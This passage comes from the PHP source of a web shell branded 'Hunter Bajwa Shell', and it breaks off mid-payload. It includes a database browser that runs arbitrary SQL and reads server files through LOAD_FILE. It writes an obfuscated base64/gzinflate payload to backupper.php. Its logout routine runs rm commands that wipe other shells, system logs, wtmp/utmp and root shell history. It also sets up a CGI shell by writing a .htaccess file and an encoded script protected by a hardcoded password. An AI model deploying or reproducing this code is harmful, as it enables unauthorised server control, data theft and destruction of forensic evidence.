801 $tbls_res = $db->listTables();
802 while($item = $db->fetch($tbls_res)) {
803 list($key, $value) = each($item);
804 $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
805 $value = htmlspecialchars($value);
806 echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>";
807 }
808 echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:1px solid #a3e956;'>";
809 if(@$_POST['p1'] == 'select') {
810 $_POST['p1'] = 'query';
811 $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].'');
812 $num = $db->fetch();
813 $num = $num['n'];
814 echo "<span>".$_POST['p2']."</span> ($num) ";
815 for($i=0;$i<($num/30);$i++)
816 if($i != (int)$_POST['p3'])
817 echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> ";
818 else
819 echo ($i+1)," ";
820 if($_POST['type']=='pgsql')
821 $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
822 else
823 $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
824 echo "<br><br>";
825 }
826 if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) {
827 $db->query(@$_POST['p3']);
828 if($db->res !== false) {
829 $title = false;
830 echo '<table width=100% cellspacing=0 cellpadding=2 class=main>';
831 $line = 1;
832 while($item = $db->fetch()) {
833 if(!$title) {
834 echo '<tr>';
835 foreach($item as $key => $value)
836 echo '<th>'.$key.'</th>';
837 reset($item);
838 $title=true;
839 echo '</tr><tr>';
840 $line = 2;
841 }
842 echo '<tr class="l'.$line.'">';
843 $line = $line==1?2:1;
844 foreach($item as $key => $value) {
845 if($value == null)
846 echo '<td><i>null</i></td>';
847 else
848 echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
849 }
850 echo '</tr>';
851 }
852 echo '</table>';
853 } else {
854 echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
855 }
856 }
857 echo "<br><textarea name='p3' style='background-color:black; color: white;width:100%;height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>";
858 echo "</td></tr>";
859 }
860 echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
861 if(@$_POST['p1'] == 'loadfile') {
862 $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file");
863 $file = $db->fetch();
864 echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
865 }
866 }
867 echo '</div>';
868 printFooter();
869}
870
871
872function actionBackupper() {
873 printHeader();
874 $backupper = "rVXdTtswFL4uEu/gSVmTSpAWxsVEVMGmMXEHot0mxFDkOk7j4diZf4Ay8Qq72c3uuNkD8gizY6dNq1bjYqnUxN/5zjmfz4lPulQlE57NgFQziofd75obAKKbqeCaZbuIUy4OwYQaKPGLu4IonICcM7Wbw5LQ2SFAWkhy26CSPOBDsLc/eJ24iN2pSra3uiYZwkxhsViXWEGACigkVj79p/HH3berfsUb+3zJNfgCGYNgpKBQYFxg8N5I0xU4y+vVyGgDR8C69J2P8z+qimp7CwvBRSpwxYUibBoNesZ8tGDlXJQAIkU482LcPzAyC5557PxsNG7r61hXwiqtgJpVTRWlnpREeX8Gy7X4LaS6MVzqc4+2m/GSom9qWLsZg3kzQH+x4b7d8WqVOrlmdQ3AOzZgUUBYD/wwMDBXwM0uhyAMEw+QPGroKb4nUskoxPcYhb2Fk72OLWhj7dgQvaRl8jGPv3HCIqfxK3P3ZfIjphKvS1hBKVUh9GpSPkmlfVGipXzHDb3e2holxm2KVYoohiz6d3Y5kwqXL8ztyP8rc4EpTdeV28dbEJYyNgGJNIdBci0QjoLc9qDiFa5bvuMaINyttz58+4y0d2PeVoqjV8c55rkJ3Ou1bHP3eAhygWFmCDt7g/2DpXpUiHJpRS00+7vASgtWh7AmA5t/kgOzGTNDoiC1x/MqdMcsvPbCO4G0k2EIgnR0cvH55OIqPB2Pz9NTQw6vk5pRQVUYhmkAustc9TsBlJktTG2Mw37oUArtb1O4OIwfSOWpiJclZNm8WigDcZwYO6j0hBKUFqqkSXnbXlp3T49r4bFfGNxSG5OT4Y1z1Er2mM3WTkPlOtaigZ3AvA+a2t66s+/Vu2JgVHAQ1uP4wA6ND5xh8Pz059fz0++fbuTWuH2c1EM+XPGDwByJ6XzUp2ZOsZvNU0/gbMPM8z6FwPkw9JsJm9yNujtGOcxWhPXhXNjj0vDvr36b+vbLaJd/AQ==";
875 $back = @fopen("backupper.php", "w");
876 @fwrite($back, htmlspecialchars_decode(gzinflate(base64_decode($backupper))));
877 @fclose($back);
878 ?>
879 <center>
880 <h1>Site Backupper By Hunter Bajwa</h1><br>
881 <iframe src="backupper.php" height="300" width="100%"></iframe>
882
883 <?php
884
885 printFooter();
886}
887
888function actionLogout() {
889 unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
890 $hardfucker = "rm -rv locales.php;rm -rv cgi.php;rm -rv dirty;rm -rv exploit;rm -rv kill;rm -rv c0w;rm -rv article.php;rm -rv an0n.php;rm -rv anonghosts.php;rm -rv anonghost.php;rm -rv wso.php;rm -rv umar.php;rm -rv ninja.php;rm -rv rev.php;rm -rv umar.txt;rm -rv ak.php;rm -rv symlinker.php;rm -rv trjnx;rm -rv sym.pl;rm -rv symlinker.pl;rm -rv back_connecter.php;rm -rv fuck.php;rm -rv an.php;rm -rv file.php;rm -rv sym.php;rm -rv symlink.php;rm -rv trjnx;rm -rv data.txt;rm -rv fuck.txt;rm -rv dir.txt;rm -rv dmn.txt;rm -rv lala.php;rm -rv test.php;rm -rv data.php;rm -rv fucker.php;rm -rv symlinker.php;rm -rv madleets.php;rm -rv dirdefacer.php;rm -rv dirdeface.php;rm -rv shitchanger.php;rm -rv locales.php;rm -rv data.php;rm -rv db.php;rm -rv deleter.php; rm -rv dhanush.php;rm -rv anonghosts.php;rm -rv blackhat.php;rm -rv image.php;rm -rv madspot.php;rm -rv pcd.php;rm -rv cheta.php;rm -rv b374k.php;rm -rv joker.php;rm -rv zone-h.php;rm -rv rooter.pl;rm -rv cp.php;rm -rv works.php;rm -rv lala.php;rm -rv lalala.php;rm -rv testing.php; rm -rv madleets.php;rm -rv anoncmd.php;rm -rv mass.php;rm -rv backupper.php;rm -rf /var/log/lastlog;rm -rf /var/log/wtmp;rm -rf /etc/wtmp;rm -rf /var/run/utmp;rm -rf /etc/utmp;rm -rf /var/log;rm -rf /var/logs;rm -rf /var/adm;rm -rf /var/apache/log;rm -rf /var/apache/logs;rm -rf /usr/local/apache/log;rm -rf /usr/local/apache/logs;rm -rf /root/.bash_history;rm -rf /root/.ksh_history;rm -rv xcp.php;rm -rv cp.php;rm -rv md5.php;rm -rv UeXploiT;rm -rv AkDk";
891 $An0n_3xPloiTeR_Every_Where_vvv = ex($hardfucker);
892 die('<!DOCTYPE html>
893<html>
894 <head>
895 <title>Hunter Bajwa Shell</title>
896 <meta charset="UTF-8">
897 <meta http-equiv="refresh" content=""> <!-- For Refreshing after ____ interval of time -->
898 <meta name="description" content="Sites description">
899 <meta name="about" content="Made By Hunter Bajwa">
900 <meta name="description" content="Bye Bye">
901 <style>
902 .body {
903 margin-top: 7vh;
904 text-transform: capitalize;
905 background-color: #080510;
906 }
907 .font {
908 font-family: calibri;
909 font-size: 300%;
910 text-align: center;
911 color: white;
912 }
913 .upass {
914 margin-top: 70vh;
915 font-family: calibri;
916 font-size: 100%;
917 text-align: center;
918 color: black;
919 }
920 textarea {
921 color: white;
922 font-weight: bold;
923 font-family: cursive;
924 border-left: black;
925 border-right: black;
926 border-style: groove;
927 background-color: black;
928 font-size: 80%;
929 }
930 </style>
931 <script language="JavaScript1.2">
932 function ejs_nodroit(){
933 alert("Login Please!");
934 return(false);
935 }
936 document.oncontextmenu = ejs_nodroit;
937 </script>
938 </head>
939
940 <body class="body">
941 <div class="font">
942 <font>you are going ??<br>bye ????<br><br></font><font style="color: red; font-family: cursive; font-size: 70%;">Take a Gift ??<br></font><br>
943 </div><center>
944 <textarea rows="10" cols="90">
945 '.$An0n_3xPloiTeR_Every_Where_vvv.'</textarea>
946 </body></center>
947</html>');
948}
949
950
951function actionCgiShell() {
952printHeader();
953 echo '<h1>Cgitelnet</h1><div class=content><br><center>Password: umar</center><br>';
954 $kokdosya = ".htaccess";
955 mkdir('An0ncgi', 0755);
956 chdir('An0ncgi');
957 $dosya_adi = "$kokdosya";
958 $dosya = fopen($dosya_adi, 'w') or die("Dosya açılamadı!");
959 $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
960 AddType application/x-httpd-cgi .cin
961 AddHandler cgi-script .cin
962 AddHandler cgi-script .cin";
963 fwrite($dosya, $metin);
964 fclose($dosya);
965 $cgishellizocin = '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